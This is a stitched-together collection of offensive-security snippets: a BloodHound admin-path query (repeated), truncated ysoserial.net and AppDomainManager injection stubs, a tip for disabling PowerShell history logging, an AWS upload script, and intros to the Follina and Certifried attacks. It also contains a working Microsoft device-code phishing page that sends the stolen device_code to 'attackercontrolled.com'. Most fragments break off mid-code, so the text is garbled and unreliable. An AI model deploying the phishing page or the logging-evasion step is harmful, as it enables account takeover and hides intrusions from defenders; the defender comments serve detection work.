// Attack-path audit query: computers that hold local admin on other computers
// through group membership (useful for finding machine accounts with excessive rights).
// Leg 1: computer c1 is a direct or nested (*1..) member of group g1.
MATCH p1 = (c1:Computer)-[r:MemberOf*1..]->(g1:Group)
// Only c1 and g1 are carried forward; p1 and r are dropped here. WITH is not DISTINCT,
// so several membership paths from c1 to the same g1 produce repeated rows downstream.
WITH c1,g1
// Leg 2: that group has an AdminTo edge onto computer c2.
MATCH p2 = (g1:Group)-[r:AdminTo]->(c2:Computer)
// One row per (c1, g1, c2); the same c1/c2 pair can appear via different groups.
RETURN c1.name As Principal,c2.name AS Target,g1.name AS ViaGroup
function Get-DirectoryContent { | |
<# | |
.SYNOPSIS | |
Function to get directory content | |
.EXAMPLE | |
Get-DirectoryContent -Path "C:\" -HeaderName "poshserver.net" -RequestURL "http://poshserver.net" -SubfolderName "/" | |
//All credit goes to Ysoserial.net and the great @tiraniddo | |
//Snippets copied from ysoserial.net | |
//https://thewover.github.io/Mixed-Assemblies/ - Great read! | |
//https://bishopfox.com/blog/cve-2019-18935-remote-code-execution-in-telerik-ui - Another great read | |
using System; | |
using System.Collections.Generic; | |
using System.Runtime.Serialization.Formatters.Binary; | |
using System.IO; | |
using System.Reflection; |
Logs are held by default in the user profile: | |
\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt | |
this directory also hosts per-application logs | |
-------------------------------------------------------------- | |
Disable Logging... | |
remove-module psreadline |
import smtplib | |
from email.mime.text import MIMEText | |
from email.mime.multipart import MIMEMultipart | |
from email.mime.text import MIMEText | |
from email.mime.base import MIMEBase | |
from email import encoders | |
import ssl | |
import email | |
import argparse |
# Upload | |
&{ | |
$ErrorActionPreference = 'Stop' | |
$AWSRegion = "us-east-1" | |
$AWSAccessKeyId = "TODO: Access Key" | |
$AWSSecretAccessKey = "TODO: Secret Access Key" | |
$BucketName = "TODO: Bucket Name" | |
[System.Reflection.Assembly]::LoadWithPartialName("System.Windows.Forms") | Out-Null | |
$OpenFileDialog = New-Object System.Windows.Forms.OpenFileDialog | |
$OpenFileDialog.ShowDialog() | Out-Null |
<!-- Defender note: this page starts the OAuth 2.0 device-code flow against login.microsoftonline.com
     with a fixed client_id (appears to be a well-known Microsoft first-party application id) and then
     forwards the returned device_code to a third-party host. The token-endpoint call is routed through
     a public CORS proxy (cors-anywhere.herokuapp.com), so the proxy hostname is itself a useful indicator.
     Mitigation: restrict the device-code authentication flow via Conditional Access and alert on
     device-code sign-ins from unexpected locations or client ids. -->
<!-- This page can be formatted to look like something more interesting --> | |
<script src="https://ajax.googleapis.com/ajax/libs/jquery/3.5.1/jquery.min.js"></script> | |
<script> | |
// Request a device code; client_id and resource are hard-coded in the URL.
$.get("https://cors-anywhere.herokuapp.com/https://login.microsoftonline.com/common/oauth2/devicecode?api-version=1.0&client_id=d3590ed6-52b3-4102-aeff-aad2292ab01c&resource=https://graph.windows.net").done(function(data) { | |
// The device_code leaves the browser as a query-string parameter of a plain GET,
// so it is likely to appear in web-proxy and server access logs.
$.get("https://attackercontrolled.com/?id=" + data.device_code); | |
// data.message is the endpoint's user-facing verification text; document.write inserts it as HTML, unescaped.
document.write(data.message); | |
}); | |
</script>
// Attack-path audit query: computers that hold local admin on other computers
// through group membership (useful for finding machine accounts with excessive rights).
// Leg 1: computer c1 is a direct or nested (*1..) member of group g1.
MATCH p1 = (c1:Computer)-[r:MemberOf*1..]->(g1:Group)
// Only c1 and g1 are carried forward; p1 and r are dropped here. WITH is not DISTINCT,
// so several membership paths from c1 to the same g1 produce repeated rows downstream.
WITH c1,g1
// Leg 2: that group has an AdminTo edge onto computer c2.
MATCH p2 = (g1:Group)-[r:AdminTo]->(c2:Computer)
// One row per (c1, g1, c2); the same c1/c2 pair can appear via different groups.
RETURN c1.name As Principal,c2.name AS Target,g1.name AS ViaGroup
using System; | |
using System.EnterpriseServices; | |
using System.Runtime.InteropServices; | |
public sealed class MyAppDomainManager : AppDomainManager | |
{ | |
public override void InitializeNewDomain(AppDomainSetup appDomainInfo) | |
{ |
MS Office docx files may contain external OLE Object references as HTML files. There is an "ms-msdt:" URI scheme which invokes the msdt diagnostic tool, which is capable of executing arbitrary code (specified in its parameters).
The result is a terrifying attack vector for getting RCE through opening malicious docx files (without using macros).
Here are the steps to build a Proof-of-Concept docx:
Certifried (CVE-2022-26923) gives Domain Admin from a non-privileged user, with the requirement of adding computer accounts or owning a computer account. Kerberos Relay targeting LDAP and Shadow Credentials gives a non-privileged domain user on a domain-joined machine local admin access on (i.e. ownership of) that machine. Combining these two: a non-privileged domain user escalating to Domain Admin without the requirement of adding or owning computer accounts.
The attack below uses only Windows (no Linux tools interacting with the Domain), simulating a real-world attack scenario.
Prerequisites: